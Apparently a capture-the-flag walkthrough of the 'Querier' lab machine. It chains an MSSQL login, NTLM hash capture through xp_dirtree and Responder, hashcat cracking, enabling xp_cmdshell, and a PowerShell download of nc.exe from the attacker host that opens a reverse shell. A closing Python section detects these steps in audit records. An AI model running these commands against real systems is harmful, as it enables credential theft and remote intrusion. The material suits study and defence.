4 mssql using msf

use auxiliary/scanner/mssql/mssql_login

msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.10.125
RHOSTS => 10.10.10.125
msf6 auxiliary(scanner/mssql/mssql_login) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(scanner/mssql/mssql_login) > set PASSWORD PcwTWTHRwryjc$c6
msf6 auxiliary(scanner/mssql/mssql_login) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 10.10.10.125:1433     - 10.10.10.125:1433 - MSSQL - Starting authentication scanner.
[!] 10.10.10.125:1433     - No active DB -- Credential data will not be saved!
[+] 10.10.10.125:1433     - 10.10.10.125:1433 - Login Successful: WORKSTATION\reporting:PcwTWTHRwryjc$c6
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution complete

# trying to steal NTLM Creds

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set PASSWORD PcwTWTHRwryjc$c6
PASSWORD => PcwTWTHRwryjc$c6
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

# start responder
$ sudo responder -I tun0

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > run
[*] 10.10.10.125:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.10.125:1433     - Forcing SQL Server at 10.10.10.125 to auth to 10.10.14.24 via xp_dirtree...
[+] 10.10.10.125:1433     - Successfully executed xp_dirtree on 10.10.10.125
[+] 10.10.10.125:1433     - Go check your SMB relay or capture module for goodies!
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:f8ae4ad0769fd34e

https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/

$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
MSSQL-SVC::QUERIER:f8ae4ad0769fd34e:3c53678686fb91df9d3eaf286b5bbc19:...:corporate568


$ mssqlclient.py QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> EXEC xp_cmdshell "whoami"
output
------------------------------
querier\mssql-svc


# reverse shell using nc.exe
EXEC xp_cmdshell "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe','c:\users\public\nc.exe');"
EXEC xp_cmdshell "c:\users\public\nc.exe -e cmd.exe 10.10.14.24 6969"

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49681
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\system32>systeminfo

Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 6 Hotfix(s) Installed.
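The chain above leaves two distinct traces in SQL Server auditing: xp_dirtree being handed a UNC path that points at a foreign host, and xp_cmdshell being switched on through sp_configure and then executed. An added example, not part of the original notes, that runs those checks over constructed (login, statement) records of the shape a SQL Server Audit export produces; the audit lines, the local-path "backup_job" control and the alert names are all assumptions made for this example:

```python
import re

# Constructed sample records (login, T-SQL statement) shaped like a SQL Server
# Audit export. They are invented for this example, not logs from the target.
SAMPLE_RECORDS = [
    ("reporting", "SELECT name FROM sys.databases"),
    ("reporting", "EXEC master..xp_dirtree '\\\\10.10.14.24\\share', 1, 1"),
    ("backup_job", "EXEC master..xp_dirtree 'D:\\backups', 1, 1"),
    ("mssql-svc", "EXEC sp_configure 'show advanced options', 1; RECONFIGURE"),
    ("mssql-svc", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"),
    ("mssql-svc", 'EXEC xp_cmdshell "whoami"'),
    ("mssql-svc", 'EXEC xp_cmdshell "powershell -c (New-Object System.Net.WebClient).DownloadFile(...)"'),
]

# A UNC path (\\host\share) handed to xp_dirtree is the tell-tale of the
# forced-authentication trick; a local drive path is ordinary administration.
UNC_PATH = re.compile(r"\\\\[\w.-]+\\")
XP_DIRTREE = re.compile(r"\bxp_dirtree\b", re.I)
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
RUN_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I)


def classify(statement):
    """Return the list of alert names a single T-SQL statement triggers."""
    alerts = []
    if XP_DIRTREE.search(statement) and UNC_PATH.search(statement):
        alerts.append("ntlm-coercion-unc-path")
    if ENABLE_CMDSHELL.search(statement):
        alerts.append("xp_cmdshell-enabled")
    elif RUN_CMDSHELL.search(statement):  # elif: the enable statement also names xp_cmdshell
        alerts.append("xp_cmdshell-executed")
        if DOWNLOAD_CRADLE.search(statement):
            alerts.append("download-cradle-in-xp_cmdshell")
    return alerts


def scan(records):
    """Return (login, alert) pairs for every record that trips a rule."""
    return [(login, a) for login, stmt in records for a in classify(stmt)]


if __name__ == "__main__":
    for login, alert in scan(SAMPLE_RECORDS):
        print(f"{alert:34} {login}")
```

The "show advanced options" record is deliberately left unalerted: on its own it is routine, and the signal is the xp_cmdshell flip that follows it under the same login.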
